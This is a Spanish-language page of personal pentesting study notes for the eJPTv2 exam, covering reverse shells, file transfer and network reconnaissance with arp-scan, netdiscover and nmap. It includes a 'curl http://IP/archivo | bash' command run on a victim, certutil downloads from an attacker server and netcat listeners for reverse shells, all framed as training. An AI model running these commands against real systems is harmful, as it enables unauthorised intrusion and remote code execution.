beafn28
  • 👩‍💻¡Bienvenidos a mi HackBook!
  • WRITEUPS
    • DockerLabs
      • BuscaLove
      • Amor
      • Injection
      • BorazuwarahCTF
      • Trust
      • Picadilly
      • Pinguinazo
      • AguaDeMayo
      • BreakMySSH
      • NodeClimb
      • Move
      • Los 40 ladrones
      • Vulnvault
      • Pntopntobarra
      • Library
      • Escolares
      • ConsoleLog
      • Vacaciones
      • Obsession
      • FirstHacking
      • SecretJenkins
      • HedgeHog
      • AnonymousPingu
      • ChocolateLovers
      • Dockerlabs
      • Pressenter
      • Candy
      • JenkHack
      • ShowTime
      • Upload
      • Verdejo
      • WalkingCMS
      • WhereIsMyWebShell
      • Whoiam
      • Winterfell
      • -Pn
      • Psycho
      • Mirame
      • Backend
      • Paradise
      • Balurero
      • Allien
      • Vendetta
      • FindYourStyle
      • Stellarjwt
      • File
      • Redirection (Por completar)
      • Extraviado
      • Patriaquerida
      • Tproot
      • Internship
      • Walking Dead
      • Bicho (Por completar)
      • BaluFood
    • TryHackMe
      • Brooklyn Nine Nine
      • Blue
    • HackTheBox
      • Nibbles
      • Starting Point
        • Meow
        • Fawn
        • Dancing
        • Redeemer
        • Appointment
        • Sequel
        • Crocodile
        • Responder
        • Three
        • Archetype
        • Oopsie
        • Vaccine
        • Unified
        • Explosion
        • Preignition
        • Mongod
        • Synced
        • Ignition
        • Bike
        • Funnel
        • Pennyworth
        • Tactics
        • Included
        • Markup
        • Base
      • BoardLight
      • Cap
      • TwoMillion
      • Lame
      • Legacy
      • Devel
      • Beep
      • Optimum
      • Arctic
      • Jerry
      • Sau
      • GoodGames
      • Challenges
        • Emdee five for life
        • MarketDump
      • Intro to Dante
      • Heist
      • OpenAdmin
      • Nest
      • Curling
    • Vulnhub
      • Wakanda
      • Election (Por terminar)
    • The Hacker Labs
      • Avengers
      • Can you hack me?
      • Fruits
      • Microchoft
      • TickTakRoot
      • Grillo
      • Mortadela
      • Zapas Guapas
      • Sal y Azúcar
      • Cyberpunk
      • Papafrita
      • PizzaHot
      • Decryptor
      • Academy
      • Cocido andaluz
      • Find Me
      • Quokka
      • Campana Feliz
      • Bocata de Calamares
      • Casa Paco
      • Torrijas
    • Vulnyx
      • Fuser
      • Blogguer
      • Lower
      • Exec
      • Diff3r3ntS3c
      • Hacking Station
      • Experience
      • Eternal
      • Agent
      • Infected
      • Admin
      • War
      • Hosting
    • OverTheWire
      • Natas
        • Nivel 0-5
        • Nivel 6-11
        • Nivel 12-17
        • Nivel 18-23
        • Nivel 24-29
        • Nivel 30-34
      • Leviathan
        • Nivel 0-7
      • Krypton
      • Bandit
        • Nivel 0-10
        • Nivel 11-20
        • Nivel 21-30
        • Nivel 31-34
    • Proving Ground Play
      • Monitoring
      • DriftingBlues6
  • APUNTES HACKING
    • Pentesting Basics
      • Web Enumeration
      • Public Exploits
      • Types of Shells
      • Privilege Escalation
      • Transfering Files
    • Network Enumeration with NMAP
      • Host Discovery
      • Host and Port Scanning
      • Saving the Results
      • Service Enumeration
      • Nmap Scripting Engine
      • Performance
      • Firewall and IDS/IPS Evasion
    • Footprinting
      • Domain Information
      • Cloud Resources
      • FTP
      • SMB
      • NFS
      • DNS
      • SMTP
      • IMAP/POP3
      • SNMP
      • MySQL
      • MSSQL
      • Oracle TNS
      • IPMI
      • Linux Remote Management Protocols
      • Windows Remote Management Protocols
    • Information Gathering - Web Edition
      • WHOIS
      • DNS
        • Digging DNS
      • Subdomains
        • Subdomain Bruteforcing
        • DNS Zone Transfers
        • Virtual Hosts
        • Certificate Transparency Logs
      • Fingerprinting
      • Crawling
        • robots.txt
        • Well-Known URIs
        • Creepy Crawlies
      • Search Engine Discovery
      • Web Archives
      • Automating Recon
    • Vulnerability Assessment
      • Vulnerability Assessment
      • Assessment Standards
      • Common Vulnerability Scoring System (CVSS)
      • Common Vulnerabilities and Exposures (CVE)
    • Nessus
      • Getting Started with Nessus
      • Nessus Scan
      • Advanced Settings
      • Working with Nessus Scan Output
      • Scanning Issues
    • OpenVAS
      • OpenVAS Scan
      • Exporting The Results
    • Reporting
    • File Transfers
      • Windows File Transfer Methods
      • Linux File Transfer Methods
      • Transferring Files with Code
      • Miscellaneous File Transfer Methods
      • Protected File Transfers
      • Catching Files over HTTP/S
      • Living off The Land
      • Detection
      • Evading Detection
    • Shells & Payloads
      • Anatomy of a Shell
      • Bind Shells
      • Reverse Shells
      • Payloads
        • Automating Payloads & Delivery with Metasploit
        • Crafting Payloads with MSFvenom
        • Infiltrating Windows
        • Infiltrating Unix/Linux
        • Spawning Interactive Shells
      • Introduction to Web Shells
        • Laudanum, One Webshell to Rule Them All
        • Antak Webshell
        • PHP Web Shells
      • Detection & Prevention
    • Metasploit
      • MSFConsole
      • Modules
      • Targets
      • Payloads
      • Encoders
      • Databases
      • Plugins
      • Sessions
      • Meterpreter
      • Writing and Importing Modules
      • Introduction to MSFVenom
      • Firewall and IDS/IPS Evasion
    • Password Attacks
      • John The Ripper
      • Network Services
      • Password Mutations
      • Password Reuse / Default Passwords
      • Attacking SAM
      • Attacking LSASS
      • Attacking Active Directory & NTDS.dit
      • Credential Hunting in Windows
      • Credential Hunting in Linux
      • Passwd, Shadow & Opasswd
      • Pass the Hash (PtH)
  • WEB SECURITY
    • Path Traversal
    • SQL Injection
    • Control de Acceso
  • Mis CTFs
    • Pequeñas Mentirosas
    • CryptoLabyrinth
    • Elevator
    • Facultad
  • PREPARAR EJPTv2
    • Máquinas
    • Curso de Mario
      • Presentación + Preparación de Laboratorios
      • Conceptos Básicos de Hacking
      • Explotación de Vulnerabilidades y Ataques de Fuerza Bruta
      • Explotación vulnerabilidades Web
      • Enumeración y Explotación del Protócolo SMB, SAMBA, SNMP, IIS y RDP
      • Hacking Entornos CMS
      • Escalada de Privilegios + Post Explotación
      • Pivoting con Metasploit
  • Preparar OSCP
    • Información
    • Máquinas
      • Linux
        • Fácil
        • Medio
        • Difícil
      • Windows
        • Fácil
        • Medio
        • Difícil
Powered by GitBook
On this page
  • Uso de Netcat para entablar una Reverse Shell
  • PHP Reverse Shell
  • Cómo Compartir Archivos Con Servidor Http Con Python + Reverse Shell
  • Compartir Archivos por la Red en Máquinas Windows
  • Reconocimiento de la red con ARP-SCAN o NETDISCOVER
  • ARP-SCAN
  • NETDISCOVER
  • NMAP
  • Escaneos Básicos con NMAP
  • Detectar Vulnerabilidades Con Nmap
  • Escaneo de Puertos bajo el Protocolo UDP

Was this helpful?

  1. PREPARAR EJPTv2
  2. Curso de Mario

Conceptos Básicos de Hacking

PreviousPresentación + Preparación de LaboratoriosNextExplotación de Vulnerabilidades y Ataques de Fuerza Bruta

Last updated 6 months ago

Was this helpful?

Uso de Netcat para entablar una Reverse Shell

La página revshells.com es una herramienta en línea que permite generar fácilmente comandos para establecer Reverse Shells. Solo debes ingresar la dirección IP de la máquina atacante y el puerto, y seleccionar el tipo de shell y el sistema operativo. También ofrece opciones avanzadas como diferentes tipos de listeners y codificación. Es útil para realizar pruebas de penetración o auditorías de seguridad.

Puedes acceder a la página aquí: .

  1. Poner el comando adecuado para la Reverse Shell en la máquina víctima.

  2. Nos ponemos en escucha a través del puerto de la Reverse Shell que hayamos puesto.

nc -lvnp <puerto>

PHP Reverse Shell

Un sencillo shell reverso en PHP desarrollado por .

Este es un shell reverso simple en PHP que puede utilizarse durante pruebas de penetración para obtener acceso a un servidor objetivo.

Cómo Compartir Archivos Con Servidor Http Con Python + Reverse Shell

  1. Crear un archivo que sea un payload.

  2. Ejecutamos el comando en la máquina atacante a escuchar

sudo nc -nlvp <puerto>
  1. En la máquina víctima hacemos el siguiente comando

curl http://IP/archivo | bash

Compartir Archivos por la Red en Máquinas Windows

Si no tenemos acceso a curl o a wget hay otra herramienta que es CertUtil.

  1. Crear archivo.

  2. En la máquina atacante poner este comando

python3 -m http.server 80
  1. Abrir la cmd.

  2. Poner el comando

certutil -split -urlcache -f http://192.168.0.20/archivo

Reconocimiento de la red con ARP-SCAN o NETDISCOVER

ARP-SCAN

Hay que saber la interfaz de red. Esto se sabe con el comando

ifconfig
arp-scan -I eth0 --localnet

Nota: los sistemas virtualizados empiezan su MAC por 08:00

Al utilizar el comando ping, es útil revisar el valor del TTL (Time to Live), ya que este puede indicar el sistema operativo del equipo destino:

  • Si el TTL es 128, es probable que el equipo esté usando Windows.

  • Si el TTL es 64, es probable que el equipo esté usando Linux.

ping <dirección IP>

Nota: El TTL puede variar si hay routers o saltos intermedios que alteren este valor.

NETDISCOVER

netdiscover -i eth0 -r 192.168.0.0/24

Hay que poner en el último octeto un 0/24.

NMAP

nmap -sn 192.168.0.0/24 -oN ips_disponibles.txt

Escaneos Básicos con NMAP

nmap 192.168.0.39
nmap -p- --open -sS -sC -SV --minrate 5000 -n -vvv -Pn 192.168.0.39 -oN escaneo

Nota: en el examen aunque vaya más lento poner 2000.

Parámetros:

  • -p-: Escanea todos los puertos (desde el 1 hasta el 65535).

  • --open: Muestra solo los puertos que están abiertos.

  • -sS: Realiza un escaneo SYN, también conocido como "escaneo sigiloso" o "half-open".

  • -sC: Ejecuta scripts NSE por defecto (para obtener más información sobre el servicio).

  • -sV: Detecta la versión de los servicios en los puertos abiertos.

  • --min-rate 5000: Establece una tasa mínima de 5000 paquetes por segundo (para acelerar el escaneo).

  • -n: No realiza resolución DNS (evita convertir IPs en nombres de dominio).

  • -vvv: Aumenta la verbosidad (muestra más información durante el escaneo).

  • -Pn: Desactiva el escaneo de ping (asume que el host está activo).

  • 192.168.0.39: La IP de destino a escanear.

  • -oN escaneo: Guarda los resultados en un archivo de texto llamado escaneo.

Detectar Vulnerabilidades Con Nmap

nmap --script "vuln" -p<puerto> IP

Escaneo de Puertos bajo el Protocolo UDP

nmap -sU --top-ports 200 --min-rate=5000 -Pn IP
revshells.com
Pentestmonkey